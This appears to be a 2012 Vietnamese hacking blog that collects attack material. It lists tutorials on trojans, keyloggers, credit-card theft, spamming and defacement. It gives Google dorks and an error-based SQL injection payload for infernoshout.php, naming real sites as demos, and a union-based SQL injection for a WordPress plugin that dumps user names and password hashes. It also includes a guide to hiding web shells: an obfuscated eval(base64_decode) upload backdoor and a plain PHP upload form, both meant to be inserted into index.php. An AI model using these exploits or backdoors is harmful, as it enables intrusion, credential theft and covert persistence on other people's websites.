12 thg 9, 2012

no image

Attacker Helper

Chức năng:

• hướng dẫn sendmail nặc danh với Anonym Mailer 2.0 
• hướng dẫn sử dụng phần mềm aiepr 
• hướng dẫn sử dụng trojan barok 
• hướng dẫn sử dụng phần mềm revelation 
• hướng dẫn sử dụng keylogger 5.04 
• hướng dẫn sử dụng bommail demo 
• hướng dẫn sử dụng chương trinh hdkp4 
• hướng dẫn sủe dụng các chương trinh nuke 
• hướng dẫn sử dụng chương trinh ShowPass 
• hướng dẫn sử dụng chương trinh smurf2k 
• hướng dẫn sử dụng phần mềm Stealther để dấu IP 
• hướng dẫn hack tất cả các webmail bằng fakelogin 
• hướng dẫn xài công cụ Essential NetTools để lấy account chùa 
• hack credit card qua lỗi acart2_0 
• hack credit card qua lỗi SalesCart Database Storage Insecurity 
• hack credit card qua lỗi VP-ASP 
• hack credit card qua lỗi trong file shopper.cgi 
• hack credit card của Cart32 Sites 
• một bài viết về cvv2 
• hack server NT qua 1 số lỗi đã cũ 
• khai thác lỗi hosting controller (HC) 
• linux shell utils (by Microsoftvn) 
• exploit for the "unbreakable" oracle database (by Microsoftvn) 
• hack 1 hệ thống CisCo linux (by Microsoftvn) 
• tự setup 1 cgiproxy riêng cho minh 
• sơ qua về tấn công từ chối dịch vụ 
• tổng hợp các lệnh của mIRC 
• hướng dẫn làm một freedback form 
• một vài link Free Sub Domain And Hosting 
• Thư Viện Sách 
• Welcome Việt Nam 
• Cơ bản Cron trên Unix ( by Vicki ) 
• 3 bước kiểm tra Card 
• Hướng dẫn sử dụng NetCat 
• Làm thế nào để Spam ? ( by Vicki Group ) 
• Bài viết tổng hợp về Hack của Squall Leonahart 
• Tìm hiểu về SQL Injection ( by Vicki Group ) 
• Tìm hiểu về tràn ngăn xếp trên Windows ( by Vicki Group ) 
• Bài viết thoả hiệp Vnexpress của VKDT ( by Vicki Group ) 
• Hack anon@FTP ( by Kha Administrator Việt Hacker ) 
• Chạy File từ WebSite hay Email ( IE5.5, Win 2000 ) 
• Hack IIS server với bug unicode 
• Format hard disk bằng email 
• Mask Link 
• Trojan chạy ngay sau khi mở email 
• Hack Apache server với bug phf , và một số Bug khác 
• Gửi thư nặc danh, bomb thử bằng Telnet 
• Xâm nhập máy tính khi đang Online 
• Hướng dẫn Hack Local Site ( by Lukos ) 
• Cross Site Scripting ( by Binhnx ) 
• Hướng dẫn Deface 1 Website 
• Một số phương pháp Hack Email ( by Staff of HVA ) 
• Các kiểu tấn công hiện đại của Hacker ( by Staff of HVA ) 
• Những hiểu biết cở bản để trở thành Hacker ( by Staff of HVA )

http://www.mediafire.com/?m3jiz69bd7nvgkd
Xem chi tiết »
no image

Symlink sa 3.0

http://www.mediafire.com/?2yo08k3a0ha6mym

TUT hướng dẫn sử dụng:

http://www.mediafire.com/?rqd1m6sgllssi50
Xem chi tiết »
HTML Learning v1.0

HTML Learning v1.0

Chương trình dựa theo phần Try It của w3schoolshttp://www.w3schools.com/html/tryit....=tryhtml_intro

Giao diện chương trình:



Download: http://www.mediafire.com/?f2kcc7z4b8zikkr

Code by: msconfig - VHB
Xem chi tiết »

2 thg 9, 2012

no image

[New bug] sqli INURL:infernoshout.php

1.Sử dụng dork trên google

INURL:infernoshout.php


2. Exploit link: infernoshout.php?do=options&area=commands


3. Ném vào phần input dòng bên dưới còn output điền gì cũng đc.  

COMMAND INPUT :

Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
4. nếu hiện DATABASE ERROR thì xem mã nguồn của nó kéo xuống bên dưới hiện ra kết quả

Đã thử vài site không chơi đc kiểu này 

demo: http://sinhvienphuyen.vn/forum/infernoshout.php
www.saigoncdclub.com/forum/infernoshout.php
Xem chi tiết »
no image

WordPress PhotoRacer Plugin(Attachment) SQL Exploit

Hi aLL ! I am OrucReis 

Coder ; OrucReis
Country ; TURKEY

I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...

Dork ; inurl:"mostvoted.php?pid="

Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users

OR ;

Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users

Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/

MD5 Crack;
http://hashchecker.de
http://md5cracker.org
__________________

Xem chi tiết »

30 thg 8, 2012

XSS To Google Translate (30/8/2012)

XSS To Google Translate (30/8/2012)


Xem chi tiết »

26 thg 8, 2012

no image

XSS - Vietnamnet.vn (26/8/2012)


Xem chi tiết »
no image

Tut giấu shell

Mọi người thấy hay thì cho em tí tín dụng để vào Family nhé 

Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.

Vậy giấu shell làm sao để admin khó biết ?

Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...

Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng 

Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:

Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));

Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika




========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó 
if($_GET['id']=='hk')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
nếu chèn vô index sẽ là
index.php?id=hk
sẽ thấy from upload
Xem chi tiết »
no image

[TUT] Up Shell không cần quyền admin (quyền User)

Tut này đơn giản thôi, các pro nào biết rồi thì chém nhẹ tay thôi nhé!

http://www.mediafire.com/?e615wih8v6c18f8
Khi nào em rảnh em sẽ up lên Youtube cho mọi người dễ xem
Bấm nút thanks để em có tinh thần viết tiếp nha


TUT BY 
h6009

VHB
Xem chi tiết »